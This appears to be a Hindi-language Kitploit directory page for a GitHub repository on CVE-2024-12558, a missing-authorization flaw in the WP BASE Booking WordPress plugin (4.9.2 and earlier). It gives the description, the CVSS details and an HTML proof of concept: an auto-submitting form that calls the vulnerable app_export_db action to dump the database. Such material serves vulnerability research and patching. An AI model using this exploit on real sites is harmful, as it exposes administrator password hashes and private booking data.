Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-12558 — WP BASE Booking of Appointments, Services and Events <= 4.9.2 - लापता प्राधिकरण: app_export_db के माध्यम से प्रमाणित (सब्सक्राइबर+) उपयोगकर्ताओं को संवेदनशील जानकारी का खुलासा | Kitploit
उपकरण/GitHubGitHub/randomrobbiebf/cve-2024-12558
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubrandomrobbiebf/cve-2024-12558

CVE-2024-12558

WP BASE Booking of Appointments, Services and Events <= 4.9.2 - लापता प्राधिकरण: app_export_db के माध्यम से प्रमाणित (सब्सक्राइबर+) उपयोगकर्ताओं को संवेदनशील जानकारी का खुलासा

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-12558

WP BASE Booking of Appointments, Services and Events <= 4.9.2 - app_export_db के माध्यम से प्रमाणित (सब्सक्राइबर+) संवेदनशील जानकारी के प्रकटीकरण हेतु अनधिकृत पहुँच

विवरण

WordPress के लिए WP BASE Booking of Appointments, Services and Events प्लगइन, संस्करण 4.9.2 तक (4.9.2 सहित) के सभी संस्करणों में export_db फ़ंक्शन पर क्षमता जाँच (capability check) की कमी के कारण डेटा की अनधिकृत पहुँच के प्रति संवेदनशील है। यह सब्सक्राइबर-स्तर या उससे ऊपर की पहुँच वाले प्रमाणित हमलावरों को डेटाबेस से हैश किए गए व्यवस्थापक पासवर्ड जैसी संवेदनशील जानकारी उजागर करने में सक्षम बनाता है।

जानकारी

  • प्रकार: प्लगइन
  • स्लग: wp-base-booking-of-appointments-services-and-events
  • प्रभावित संस्करण: 4.9.2
  • CVSS स्कोर: 6.5
  • CVSS रेटिंग: मध्यम
  • CVSS वेक्टर: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
  • CVE: CVE-2024-12558
  • स्थिति: सक्रिय

POC

root@kitploit:~
<html>
  <body>
    <form action="https://wp-dev.ddev.site/wp-admin/admin-ajax.php?action=app_export_db" method="POST">
      <input type="hidden" name="action" value="app&#95;export&#95;db" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
टूल डाउनलोड करें